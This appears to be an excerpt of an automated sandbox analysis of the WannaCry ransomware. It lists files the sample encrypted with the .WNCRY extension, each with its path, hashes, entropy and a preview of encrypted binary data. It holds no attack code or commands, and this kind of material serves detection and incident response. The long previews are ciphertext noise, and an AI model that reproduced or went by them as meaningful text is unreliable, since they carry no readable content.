Preview:	WANACRY!......v.'.v..<....H.?..j'......e.......7.._......b..wY...Dd.o\/m.o...........hz%.Y....Y.@......"..a...X.....N.dVss...IQL......9......yCl....3.?1..r.^.?...8..T_M.G8.p.c...F..s.m.......Vsi..C.".x\s..w.BT.....o..Z.Z....p. ...$=HS..KN.~.!p-.}...................' ..j<....V.o..NCq..\|.a.......m2E.=^/....s.-.o..$Y.ubK....;.....:;....d.....D.{fn.W........T.},H..F.6....E.[\.f..E"f.?.+6..+'...]....3.Ae.b.+C1{.<pMm.....R..&._...i}7t,.....>....X.....=.b#.....8...G...V.+.....QpD......P}.}.\|=..:..8.,/W..l\|LG'h.._]../.J..y.9ex.C"K..J..m0D..t.k..gq..v..R,.l....\|KO0........B[.J...[.G....K?j,W.<.'D..U...v...........}.........+..4....Y..D...7.......H.hB._-.2.}.).uZ.MD.G@.,$..H2...>X..V...Z.].i..6..R.yw....2...b]..o..5;...G.b..Zo..v.T0..w.K.o.K}."...D...CW.%t.h.t.....CP.{,... .}.&4.VT]iH.9.........F.g..KOa.i..0.>.N!.....,.5X\......na..pl&..[.Up...Z..`..U..)..kxU.\|l...q+.m..6...<z..Gq.o..4./.?...<8..d...e..3l}.....#_..K.cE.z..%^.....S.j.gk

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_37_00_4351.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	7.855826292907235
Encrypted:	false
SSDEEP:	48:bkk9KBgKdz5dK9l2LzQg6htfUZFJI5dwF:oKCg0zb3UzrcZFW5dwF
MD5:	305DBAE47C06878D8D3896F045B659AC
SHA1:	4722D06C66CCE52FFE09F4008228DAA054A481E7
SHA-256:	A1B5A0C2B1C7BB12C482F9A74FC813194E6E260C1FE83A30E3D83A4E380AD658
SHA-512:	18D38687BE202820DE926B756125FCDBDA073A00D06125EFF3F2972B29F9D6CF145BFFA5F2B82E25994C45CEDA3FA6E982C286A0977E2FAA518A149A1AD35041
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....B..H....6.P......k.M".I..5}.'~....../q..-....l.!.v."U.7-...az%..N.,k\|.....9\m.T+F.%......u.Io......<.'..f...N.].8E.Cc.LIl.vh..,..5..E.m.H2.>...[.[..EEZ...k..=.O..IRH'j+p..cL....j..!.....TJb..........,..../. +.."...D.<.e+.}F...........MPem).`.................j.`...2 x"....=..5%.,.w}_5f.c;z{..q.L..!O.L.).N...\.-pB...:..2t...s...#f....C&..r..7."LD..y]]D......>.uk..c...>..2."...j...F.5...{f.5. ........-;..}..C..O..)....N..<...L.i.U..;...8.%....P../..L.zB.A[......Z..:nGT.".M...idhUu....O.p.I.)a..A.z..v.....F..1Fs.M.._i....\|.b.CQ.............EqH.KN4..>&.....H.......7..j @.SyLg..FZh.Zu.\l.5..!.v.........Sr.y.......Cct...08\.F.,sbzR.Wg....r.,_I4...1.,.,$K..]#..w&Bw..t...T6c.JZh......wX...a..\..).Q.....[.QSCquA...P..W..%O..].+!..8:....h.[...o..$b...i.U..r...pW.N$.Z........E~+.....I..b~....)..Z7.. ..;w..w>..i.`0......s.........}....e.....-.a]....{...K..l..M$..+! ...K.o.X...9<K.lp_...3u.n,.0)..L.ob..x..%..0SeA`\.CH..b...8P

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_19_38_8611.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1880
Entropy (8bit):	7.888320797181919
Encrypted:	false
SSDEEP:	48:bk3/dcU+NImgBiTMyu4o52//8plKOY/UstsyfCl5/:oP2Ry/BiTYa0lKOYc4sR/
MD5:	635D18258F96B37CA16E8AE31C937408
SHA1:	26A0F578E027089E2079FFD512FD179B68A6B657
SHA-256:	74793C2CDC1DCA937D7A5A94CCAA30D8CD477309EA686251EF12C7FB6AEC645F
SHA-512:	EB6152329E8A1087599E10FCBAEC65D81F5EEDB4927417EFC970CBE856808A21C15575BE1B65325D7C556FBC5627240B98CDF0FD29B013A87107B0A4FB0207B6
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....,_.....~UWf)t;..]}.w..fP.#rD.k...Z..^mR......6..4...0..y.^vx.u..A..n..9.p.\d.'N...C...j.@P.......8..S..`.....-@.W.P..>...B)ecl$...4.s7.{..J,.aFy..v....1g.e;\.t...;....1Q...%.a....-..u. ...PV}gsp...9u.(.:n(a.n.g...SL.....NaW.#.. h.....Ig......5........_.....N......y.0...w.t.'.!y.D._..+. ).ym'P\y..%~/./.0R..`., ....P...M.. L.. +nF.P..4@).y.pD.cxa..8.$.f3..Gz.p!4q;c.H.}1..y../..g.5........"./..^(..]....&Hp"R8O.\|c....t.........sX3.e.6.....^.^...F.B.K.ls...DB.H.V.P8PW..KzV.3E..o..j^zM...v...Z..y..m...A....Y..z.\...O.6H..7.H..;t...g....!M....1..a.5..Uz5......+:C.M..}!%. ......v.>TC..?....?..l....v.......u{B./ok[...<..I.L.6Th...mQ..0fW..r...O%.w..}..e.....ft.=Q...'..I.cCjW,6...$2/r..8..`.....t....\./.T.u.2.}G:.... {..c.....A{.6.w$.}GU...U....:..Z.SR.8..R=.\|....,.....Vz...L.6g.t8.Z,...p.b.. x<.+..$.-yp....G....9.q4..N........%....].t...,.(......?a.....t......)e.dh.?........e._..J..........[H...Y.\1...P{..#...J:2i+.Z]..%..L...s.N....\.J

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_50_48_4321.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1944
Entropy (8bit):	7.8889793603725655
Encrypted:	false
SSDEEP:	48:bkk2qlcpVHAyRl40fEL6vPHVoT8coEVbZKEev+I6S:oacvgIla4vEVb5ev+S
MD5:	FB08C74D23793E8893D508E50C19F37C
SHA1:	29C114D870AF62B6BB86640DBFE4E623007D7E44
SHA-256:	E90A658DB4FD8FFA97794A2169B210CAA448443C4CA7C90789F4EF2BD36CA7E0
SHA-512:	2CA00C181177304109E69CCE38AE9DC9BDAC52136A8CF62643CD7AF48721D4584F56681F0FE66D31AE7D5DC68CD262D1DAA2851C3752149F199725B81E550ADB
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....q.....Rr..'=..w...J..O.Y_..Y.G<.:...[..3.u/..n.{......V......1.J.!.....w.=.d..........%..[.O...UX.'&."\|...&....'xR,?..Y......#..,..'.&`8;.O./sQt.......I...).`&.&.q..e.........v.....t4s.^..P....b..n......T.R......S_.h..]\1+.......J.S.N...q+.dy......s.............-T....[.q.#A......{.DW.....0..7..(.p....YDD.9.%6-..o.H.8...e..t..a..gR... 0..wM.5"X..%3.\..._.(.K.^...Fm.@Dt.}.._.....^~.w....6..P..#k.6......{...\|Q......A.b..'..K....NS?...."_=\.5..BP.D.>>.c....&.8...Bz}....w.%Br....p....>...y.\|b.f...8$.`G....y.&ma;.;f#h.u...A...#...H..?..Z.FB..!Bv....=K.+16........r.4.)...>....Y... ..........d...e..1....44]..Y}X, .px7A.y..P{.J.G..uI....>...../.k."..K.mqH...J..Z..#..b]R....P...-d%.o"D.?....U.!...}.v..\|..&..^....H..m..{x?....3t.m...d..Xi.T...KxlXM..".j.wN..i.PT....C.;.....M..!p<.W.i.vv..]..!P.\..$.\...A...F..i...E.......pq\.5<!..-.Uw..~....%O1.h....bw.......+..\|..a..~.%c...d......q$..8...:.v..jD9..wy..O...Z.8.....=.E...A...<..6?..r.w<<.

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_18_17_07_25_4954.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	7.879335948082946
Encrypted:	false
SSDEEP:	24:bkol1+kIdqccnfNQqUKzHy0naQG8QzPxF6CntU933nnBeFxFt1Wxvfg8BBs:bkoX9IdqtfNTpzHy0ZKPG3nBIbt1k5s
MD5:	C914AE357ED8F46086265CA814A38554
SHA1:	D90831A9A401BE6A56BF192B2D89B3E83D7FFCC3
SHA-256:	1195E8D48F2D02EBDB366E9ABC50D256DCA88B41C54BDEF7A30E5AE8094DCF26
SHA-512:	B80AEC9FE8354736AB85237BB69B2592D3D994910FD9626846C1473A19CE6BBF50FFE777C2D284D3EC4F18FD52300AB4D29DEA66DB7202A02B3A1380A304FB18
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........H.(=..QJ........&..c..a....q...O#..+...>o`...(.T...J%).K.4F4i.3.....q.....Vz>8!.,....}.[KmbeQ...s..U..~.^bv!...v....\|......}O......qZ...3h.Am.3'..6.V.....g.A.r......~.`A.0%........QK.M^U.Rnh....F.N~.8..)<M.......wf.@.....%..J.\.W~K..o.................R.m.{.^gmc..9.@.."Z@..,.li...?.....?g..\...e\|..W./.<...$.z....u.=fp.(..-.R...{.E.hD5xi.9.....e@..G..j9.w.>DuL..u..O...bk.'~......u............r.`....5.....Pn.e.R.Gn+...p....X....B.....6.L.s.7...c!...a j`..c_.7O...#.V...#.b.X..9/.G/.H..3T\|Q........2...f8S..Q.........hOu.#w.......oK1F.,.M.o..,,....9...a.z....d.....o.A.........mi....<.....U.R....]..c.r..xlr.x.XU...:q......Nu..,...P..q..Jn..Q<Q0\|..<.)...8V2.%..KK...Ja....lt.,....&v.K..[.....tV...=t.........s....K-....15..w.Nq.U.......4..A`V.&;.^9..u....y..K.Fq.....Fie.7`.H.....H}.:[..w.f..<N.q.~._...K..;.+D..uO+;th....A.8...GP...9..0.0Y0.I\|.l..J.[.d.9.j.x{..]..'?......=.C.C^....6.c!....D..p..m).i..4.8(.S...\.=...<l...<_

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsglobals.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	339640
Entropy (8bit):	7.99953826868263
Encrypted:	true
SSDEEP:	6144:n9OpRaDzrOK679Jh1pkqv17trd67lA/nfW+3J5gqfm0GHXAi1dbmww:n9OpRar16BJh1Wqd5rgO1LgSm06nK/
MD5:	FC6776B826A664304B1CC028B6542046
SHA1:	AB5B1A3414D80D116F8DBFC88036F4CF0C940D08
SHA-256:	D56254217D51F5B3F2CEB6A6090F1B90DD462B0CDEBDE0A96937D28C166D2267
SHA-512:	1CCB33E5E16ADE301750EEAF6242DB0B8CE4CD53E98745D7303F4B0203B8E4604EA56B507FBD332F43700C5E67E3C32E60195EF3615737D467679AEBB6023DBA
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....@..z..g."..l3..].......d?^c.D<c.zS.@-....NZ.......3.....m..u.L..M.i..........;...F.}..mL..Ok..A.Wu...A.)..B.X..XA!..Jmn.9i>.\..J...l...T....g........-.e.T...\...............%..({.Y...`.!:A....]$2...3s,..O......>L.m..;.........?n.w...j..Y......-...........&58.@........u......xs.2.....d..M.......G..i.....G....{S...(..-s..e%uE...\......Yf..F.UL.\|.k.6.I.....t.&X...s#...M.=V..uW~.......$X..e.1KXOzJ..?.H......z{..R.`e.Y!M..e%f.V..t..?..)WL.7...G..Z..#jt.&..<-8.......+...._.P.1.P._...3cZ.=.Za_\..z.V....~.s.sCh...@$....v.z.....Y......6z.;:;..w4..{.A..u...D........99......6..Lm.....;...._..Po..]{...x[.o.?.:..Zy..mT7e.MS...j<.2..C!....Q4..A.2.9...7.b..E%S.3..B.s.w.i.}!smK..7..}.j..B.P..QW....6.....\}z9....8a.%....A:,.r..'1~..w{.O...,.;6..Ta5j.ST.B..#..?..=Y...~.I.....6.....u..-...}.L..V\|7..##.&q.$u..._..\v......_.J..h.:..PzjAn..U.5..^x..f.9...7../..-D..\|.....c..2..........Q.+.C[i~....'.....wh..Q.....fAc..Z.0'S\.......w...

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appssynonyms.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	383288
Entropy (8bit):	7.999514231546068
Encrypted:	true
SSDEEP:	6144:su6fOx8pPxWf/b7EI4EHIup+1GBEt/9ciJy/ImS41wgX0+8d7vMZTL++SNpiz5r3:HcOx8pYfJ4EoFs29ci0r1wgX0Zd7vkTb
MD5:	1DE5036CBC453C3096D88CB4E1017E37
SHA1:	7D4B74E83BA0CB659C4465A86B666040C2AC3F09
SHA-256:	33CC4146B20E1A0420B59E8A8D719E39F9DB6DAF9C7571FDC59EBAA4C23B4312
SHA-512:	482D0A63A24D238A7115EE5B6910D99A3F97969CA9A71C471EA890ED0A6E57A2BE96354AC1A5BC58B4B9924E81C4103E7BDAF2266B17FC91F3C581E6BE7ABA06
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.........<fV>....H.U.cB#<..+=.C.w.T....n......(..^?..l..zSc.....ej.Tme...0.P1w..u?.&.79`."D{....p.y.......<m....._..i..#...=.T ....i.]..z..z.k...RB. T...=%..z.a...>#L...4.j..p.....2.N.p7;.....+P..'..m.%UQ.CF..z.<K..k..d;....j!.....Au.:!.~o.E...H..................."O..>....S#{x.99_..g...1.6.....S&....E....q.:..w.!....i2....u.w.XG'..=ue.u)L.Y.....&.k...'.F.Cx1..:..y...H.>\|vE.........G.W....@....@h,A....S......\W.$MC..e..>...6a_..-I. .J.oZr....$.Q.o.\@.1.{k....u8..x ..Bw..OT.r........t.x.....9...N.g[<.n#.........(S.Q.jb..........o....E<..-..[..'....g.)d.........e.r....'...P....0....%}s..9...e.....=&9.....UR..%..4h.F.fV-Q......pG<.~..T....r.._d.@.y-Ss.2.u.l...~$.&~Jg....D.B.\|....../....M..D[...@K..9.).&XO.\.=..#..?.4..cE./f..t.\.....o.B3..O..:.~..O.`"2P.....1"}...$.WF._....r..,...8... ..z....L...Q.zyC&...L-e.......4[.......9.hD!.-.....t............Y....*.z.A....J".Q..pZ.......<...`..s.....g.,...K...F...&i(..y...G.....p.\|..4{k

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{46669ec3-9227-40ac-89bc-b477e4677a0b}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.99595578837881
Encrypted:	true
SSDEEP:	768:4eBaOBuTt29+mNOVDVzIhWPYvSUpL1ZnAFwbzR5IKsJJS2zMZVAZHfI+p:RBvuW+wOVVIhfvSKL7nAFwh58ZZ/IQ
MD5:	BD5D1114F91BA675B7B232D7385C2D41
SHA1:	FDAB09F44920A97A6C292ED44E6897490C688809
SHA-256:	91C99ADC60C78CA8D0FCDE56C09D5FA0B2CE7FA1856344DF22805B70614ECF55
SHA-512:	EC2DC1BA2D3A0FA00655172387B9EB026459E457B99E0D3B4D6D0758F566D86127B127B97B07079A72073D3AE8EB40963D5831CD88CA42402ED18243CBC08708
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......s....u...]).U....(\|.6.H-..P.~.IQ.y}...x..{:.;.. Z.X.;..1C..P...sP.G......`..'.%..v...<....H......m7D......T.....%n..}.;.m...P...qRF......=..[...W.F"xj]..I.qp.......R9...g3..M.%zC_.....D..L.h,_..5UB7.3.h....M..P9-T.B...\.{...'6...d.%....y.........(R..2..$...[~..H$B.[..#+7@...sV.d..2`......(...=U.+..-.(3?.Rg....b...)..$P..5.....g.....7.M...8..ls...mb{5z.UA.?..8.....C..sj[...y......I{o..u..@.Ro.W.I.JO=u+.r...\|`....x..Z........g......K'z.r-..y<..n.5X..eR..?44...k#..\...9.....JY..z72...{&`..4....J..g.CJ..}..CC.U:..?.N..i.L..\|..#...D.~.->.7.....\|..H.....f...2&....QT...eOk..3.:R..n}..Vw.;T....b...:....!.`..s.W.!>.......\...Z..N.h.f\|.1....\<.^.5..$.c....Ep.4.O.....[n.a.[@u.7.).....$...O..V..Oc92.4...i.8@Yg.Z\....~.p..(.....Y.C...iF...GW..{.E..sI..t:....>.SX....j)).x.q/...:......a'y[...S.R....F'.K.12W..FYl..f..2..8..x.U.A8.....J.4-....b...,8.1....w..7c..Y...r..eu..Ez#.....V.,..#$...X........}o%!{.4?..6,.........>S...r.]t

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5e0f71d6-4ae9-410b-87f6-29dff172110e}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.995829964069959
Encrypted:	true
SSDEEP:	768:B1NhpcaSfi/4Aa9mteZEiHuXVXlGFB94kn3GN0gwhFPU8uMTgRSV3lh:nTpc6/Ta9mDiHwXlGFB9wSuMTFT
MD5:	81FBACCD2C793241E17B82618AE57A04
SHA1:	D884C1612F66F17C3A372D354B218CF76782CD1B
SHA-256:	8584EB3F535BCF0B4E9A660D2A3EDE4A694F00EB17EFAD9F969776467BB324A9
SHA-512:	531FB585DF47F3367406CFE7AD8A5E1740A4D1B0A153625AF5C2F4C583188EC06AC79F7EBB3FC50C753E18B108002A1E1BD44D1A1BCF55B9B642F80C7FBD98D4
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......)U..p.#5Z]......_..\.aU.."....?M....LO0TmPj.1...v.''. .z.8.31.a.."QpS~1..o.8.U....-..S.Y...lU7$A...e..FJ..CP...D.2=..e..r..c.X...U......_...+.}.Tv.).....=.......z]j..E...2B.......I.SJr.[..$.(..K..YT..,.......5....L8.\!Zc........~.....NC.....y.........o.......u....^D.!....-:.cd.=.g9.Pu..E.......d}.,.{s..5....Y..].n).WE.8..w?,&..O.....(y.......]....k$..<............_...v2.K.!S....H..2.....).d..!.'.qYp.W.qu....u..4.E....3.....\.,.....f.>...T........6.;Q.....-..(...r7vW.@0VeA..';..N-.....&s."wG.i< .........`..._1..^..r.......ls.<....V5.g;N....:(..&..@?A.....C..y`C........"..G.5....".......fI.B...3.x.X.'..R........~'..85..F..X.........>...gVp}.!.I.`.?...W.O6`...g)...&!.$..Y.f..."u...n..u.....ru.\|F(...r..R.B.ywb.@R\|.Hm.;.(R:.I....1..T....1...cOC.....5..G..b.@...?....f.Yf.....h.HN..y.o.S%U..$.[..y.7.......'..I,.!.i`h..k.1..PY.UT..O.\|V../.:.7.S+-.8^.Y.8..cEVVgI{..*u..jd).B>Z.Y..h$.;.!2..d9{D{.Bg.LL........a\..+L....<9.d..

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6e3a287d-8222-4208-8758-9aa4793f0897}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.996057589590536
Encrypted:	true
SSDEEP:	768:wg4LDV7vNEgWapHlTmAmjztuFikW2D4Tus2SS8g0FjTz90yuAJ9Dc/k0VxDU4KAG:Ah7VEgtHlTNqvkWkGusL3Fj/90ho9h0K
MD5:	C3F53E4A24CC2620E56488320C1781F8
SHA1:	93A864EFF6497FEAB4E307DCC0A981ACEF06ED6C
SHA-256:	440E8A6A8CF1BF3EE299DDF9FEF2C4BC431EC6A0C7402CA189983D7E9FB51991
SHA-512:	F52DED1C943C6EF1911ADAA83FEBF7EA32737A5D164A3D99A82F1359543D681E52D1D2CFE9A9CDA47B384FB1CB3D13EB424EDCE522CCEB984884C83556DF6112
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......0.RD.P.b.k.(.^..~.a<..yJ..8....v.z%8+Om.~w.......]C..4/..0S... b....t.kK".....'u.y`b,D.`..>.......X..?.p.'..R...>..$...I.c~4T.r..2D.ON..u..o4.X<?.qp...6.W..(!4h..U..<......@Vy..f..BMe...3...j....N.t...&9.^....1.ao.....:y.....'....7.. Nf9....y..........j.g.q..;.....V.._..e...T0_F.aA.IL...;.&.>.....n@.q..n.zK..;.......u..'kwzh6z..v..;q....>.`.....{....S...Q.0..e.oz.....U..D...Y.l_.`lX...."......F....F.%.^..YF....4]..x^v.^!.......6..S...=-9..X ...........0....e..d..Z.%...v.{...].&Y7...&.#.v.?~}.........e.^.0a..'..w.Oji%.F..n..d...^..0.mga......CR<._&...6........FY...R..r..I`..C.{..C>.6.....9.^/+...E..Dv.h.e.....t"...H...$.. .s.Z!.V9.%...U...U.j.......p.q:.O.V...~)..:..2?..y.I}5.Z.....8p.....;gv..?},.Gg....v..[.....G...9R.......#^3-..k....U.u....i.`...s%x_.[.3=..CoS..wz,V..9U.f.w..........B.vh..9.a:I..6'.^!....wE...(6......E..d.k...eE......G.~..AKMEY.IP.\|.MED<rR%.-HK.G.Y;...g5..k...m...v.2..;..Y~..E.J.7vL.9.F...;(.Y%.x1_

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a57f3ddc-63c5-42f9-b016-09afa52762e5}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.9957123401853485
Encrypted:	true
SSDEEP:	768:Eef+wCk9DlbXlLcpyzyRNT+4iGmMDBxb1R3O2zpDDsSkxTaIe6Vq+66aAywhPI6m:WwCk9Lc3NT+hABxbz3R1Dg3e6KLwhPcx
MD5:	889367C183C0C45318D8FCC7CBA045C1
SHA1:	81284DEBFF1EF0F8F31FD26819DBA717214EF71D
SHA-256:	C4DD9ACA7731CEB2566C3330FEFDB9150119F1A6F8F115CE5E77E3F3C5B24E4F
SHA-512:	ACC0108B479FE8D4DFB4272AE34B6C6666CD75AAD539B7228E9E1F4EE96049E8F6F3333F74E9696B154EC4C7CCC410CC9EF85087296FC90CC81CB3DD49C7833B
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....-....3P,...1.f.W.n. 0oc.......ZO......?..<..j....t.e.\..[...9\|O....yl......9B...........<-.....2.9k..~....0.C9p..Z...<._,".h...l9....I}..!B0..h..5.....!..i.V.....b....^x...F...=p.P..[6R."..E]..........o.s..C......No&..#h..z40.A.xsg.%.8..f.....y.......;."..tt..'s(...&vR.8Y.c.j ......9i....\|\|.$......,...:.....'R.ST.U.ch..l......q...0.........u9.M{P?.;O.$...).ZK......Z2..i.q?.+(.N .M6.:..A........kVD^.l.....G.....c..e....j1 .3.v....%H.....j9S.......D.^....B....t...1io..u'x...5".[..zK..D$iP."e.JlX..L+T....S..`V?].v.eO...".>h....'.........O.r..=C..;WA(u.+.t`.f..B.KAM....u.U...w3...]..fT.rZE.E..5j;\|E.D.ygX.W.g1m.?L.@.;......q...(..\|q....._.!.w_....u.R]^B..{....m...&.0%..s%......6.p.O......L..S..".w.....EF6.F..4..*.S.......y..E..6t..u0L.:.)2N...C.............^C.d.4...p....u.^......Z.O;....\`....;...n.3.....)...h....7....[.....'..v{Z.T....)H....j.d.q...D.."0..l.s^...:...}....'.]!f.1`.......6x..0.{A`^.M....l....@..m2.b<L.

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsconversions.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1426184
Entropy (8bit):	7.999871184482246
Encrypted:	true
SSDEEP:	24576:QMIl6B9pxhk2r39wy62TjliBvp6ajfapXhKRepcu6g+zCgZpiw1oQqlk+jxCCj:EALbteMPl+pHeDKYpdqZd1q+ECCj
MD5:	C0E44973ECE67A1163A2FE3008536B44
SHA1:	B22BA50E086AC0AE0C895F90D395635E8E946FD1
SHA-256:	EE9185188C7D7E57B2B58845AF199220E50CBC1AEF4306972E46D940291E88D5
SHA-512:	A84EB475DEFF988ABB8168EFEB566CD4B4882E6E004DEEC6210EF78549C68314272D232EA2B8918FFEC18724FA98FD13728505056BEC0C684C8F987EC929198B
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....x+. .qa........\|....d.s.nF....I..(.=..1.t...6...U._Uu..W7.....$vSfy.S.>xv.S1',.:>...^.....[A..[......??.....g.N.B..B.;.j.Vfqs.R..9H.V.S...O...V5.j...GDl./,.#1`....TU[....r....D.0.&~.n.....G..Q9V...@...P`J`.r.g..'.s..............@R..];:....D.P................n~...3../.r\...O.?....7n.+.9...y...R.=..&..B..h.....0..D."...9.'.\..5I..f>($..BZD&]S.@.......{...0..xSv..K\3t...=.Tt..v.S.`O?`...].SY.;v^?....Jo.1U4..6.......7...R...[b..W:.k..z.....K.3R..X\|H...7...qh.a..7.t......!.>.......gq.1.....A.......o.._..d.W&.8....b..\6...."..y%...v......T..^."<......;..t...[.I..#i.OE.e.n&.e.._..0.K=......Z....ui.'.hV....y..c..u?.f.i...Q."..$.hh..-6T..lN......N.).W..Q.\H.........t..d=N.37j.3._.D.R2:D-..+.[.SR..^......^.R ..c...#H.oP....GP0'..^!...~.k..c."...,./......'..<...8..3?..4..%.7.+.T...L.;.$g.8....._.".K....]A...kI........a(. {.[No..F...0..]PI...Ch;Y.7...KNM._....v1.....3.P#Nd`.R..d..0...TM.~...(}bta.....)37..e4N,..V....0......9.T8.p...

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsconversions.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	533032
Entropy (8bit):	7.999651614034114
Encrypted:	true
SSDEEP:	12288:mUhOmiorSkmnh4J7/58ZuJPws4Wxz8hFcJ4B4819kA9zUGwbZ:mUhOmiopu4JKZCw5wQFcJ4Z19fzPSZ
MD5:	D15172182F901D6B02A0965FA7B9F2EA
SHA1:	385949672C02CF0ED750AD7477596E86A9AD5716
SHA-256:	6DBFDE99E1C4DC16A62DAF8777303CB0CF690FD2F998C02FBD892CCFAD235194
SHA-512:	19C71BCE8E67214EAF4254E9F5B625AC9F34E0E7ACE77E5DD1248191060EE52F5CE5092EB3E2F5BFBAA1071E649636B0E10CB7FC6AAF6A9FB3D2284E9DA14CF5
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....f........z...W.w$O..+..I...=cJ.m.1.!\.N...7...O...t".q"......U\W..r.R..Z.(+S:..I..h[.l..8q....}9]c.%d."..4V.I...5.=+s.T.!..%..>.......$....P:....eL..!..]X_.<.>'.w...."b.i~.e..U..o.....y@..Rg.A.W..e..g,h.)...D.......Fd+.p........1.............:w.....!.......h...........I...h..?_F..4G.....l!...'YN_.:...... .w....?K.h/..L.:.A..C....ad;.A.9.\C\.o.X..m....2.y=...S.....R.9}.\|...5E.L.1.I..4c...x=g.w-t...^w.x..l3U~..E..+..zZ..2..QHUt\|.P.HT....8.......cr.dd..Sz..e.^X.....9.V......4.1.MM.a.LaX).7[.Oq.>..@'....zu.......?'t9Z....F/..V1o<..r......e....j......^.s.Bn..~.......SP..T...Q......!.d.`......r..oL/........;..;\t^D....+..rW.~.A}.....I.d+=.nB....l....=.,..M...~ '4[jk.H%mkT..O.%r...g..L.!..xp.r..S.....O=.2DHd=.....]...G..w......}&.S.8.v..;.=;.Y.p.\|..F.}p.O.SV/"..."F...$W++z...=z.!:..V..:.o..v."./QD..^7.+..n.5...n?...<l...w.#..E.H................[s.!6X;.m.Q.T.\n..P...{#.O.......AW6=<xX\s..".....:..3nf...@."Nr.V?..."..S?..f..Dd.....~

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsglobals.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	62648
Entropy (8bit):	7.9972012661735254
Encrypted:	true
SSDEEP:	1536:kyhojO2JD+lSi819M2Qek+05+J7iQzEZpbeEGqhBB:k0ojO3S9rj048MEzbeE1hb
MD5:	6E497A992F989C6C6A935662CBCD918E
SHA1:	BD9B6866A6E9534A0F1CCC9EE33756AE323689B3
